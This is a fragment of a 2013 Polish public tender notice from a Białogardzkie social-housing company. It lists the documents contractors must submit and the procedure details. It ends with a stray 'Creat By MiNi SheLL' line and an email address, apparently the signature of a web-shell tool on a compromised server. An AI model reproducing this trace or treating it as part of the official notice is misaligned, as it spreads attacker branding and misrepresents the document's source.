<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku podmiotów niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz OFERTA, wg wzoru zamawiającego, o treści odpowiadającej Załącznikowi nr 1 do SIWZ.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wykonawcy składają jeden formularz OFERTA.
2) Pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy- prawo zamówień publicznych w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia.
3) Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają zgłoszenia do ewidencji działalności gospodarczej ( wystawione nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony  przez każdego wykonawcę.
4) Kosztorys ofertowy, wg przedmiaru zamawiającego, stanowiącego załącznik nr  2 do SIWZ 
5) Wykaz części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom o treści odpowiadającej załącznikowi nr  2 do SIWZ wraz  ze wskazaniem zakresu wykonywanych prac przez podwykonawców.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany wykaz może być złożony wspólnie lub oddzielnie przez wykonawców.
6) Harmomogram  realizacji robót / Wstępny harmonogram realizacji robót.
 7) Oświadczenie i zaświadczenie składane w trakcie postępowania stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów w zwalczaniu nieuczciwej konkurencji, które nie mogą być udostępnione osobom trzecim, oferent musi oznaczyć klauzulą:
8)  Dokument stanowi tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 4  Ustawy z dnia 16 kwietnia 1993r o zwalczaniu nieuczciwej konkurencji (tj. Dz. U. z 2003r Nr 47, poz. 211 z późn. zm.)
9) Opis dokonywania oceny spełnienia warunków udziału w postępowaniu: Zamawiający oceni spełnienie warunków w zależności od złożonych dokumentów na zasadzie  spełnia,  nie spełnia .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Czy przewiduje się istotne zmiany postanowień, zawartej umowy w stosunku  do treści oferty, na podstawie której dokonano wyboru wykonawcy   
1. Zmiana postanowień zawartej umowy może nastąpić w formie pisemnej, pod rygorem nieważności.
2. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 i 2  Ustawy  z dnia 29 stycznia 2004r - Prawa zamówień publicznych.
a)Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie,  której dokonano wyboru wykonawcy jedynie w sytuacji,  wymagających dokonania takiej zmiany, bez której umowa nie mogłaby zostać prawidłowo zrealizowana jeżeli w grę wchodzą okoliczności, których nie można było przewidzieć w chwili wszczęcia postępowania  o zamówienie publiczne- art. 144 Pzp Zamawiający przyjmuje,iż możliwość modyfikacji umowy nie może być utożsamiana z możliwością wszelkiej ingerencji w jej treść.   
b) Zmiany umowy będą możliwe w przypadku, gdy:
- wystąpienia okoliczności skutkujących koniecznością zmiany terminu realizacji zamówienia;
- wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy;
- w przypadku zmiany stawek podatku od towarów i usług ( VAT), skutkujących koniecznością zmiany wynagrodzenia;
- wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzenia SIWZ i podpisywania umowy, a które są niezbędne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs-bialogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Białogardzkie TBS Spółka z o.o. w  Białogardzie 78-200 Białogard ul. Dąbrowszczaków 18,tel: 94/31244-26; 94/31291-15 e-mail: biuro@tbs-bialogard.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2013 godzina 09:00, miejsce: 78-200 Białogard  Białogardzkie TBS Spółka z o.o. ul. Dąbrowszczaków 18 ( sekretariat pokój nr 106 I piętro). Otwarcie ofert dnia 20 listopada 2013r o godz. 10:00 w siedzibie zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com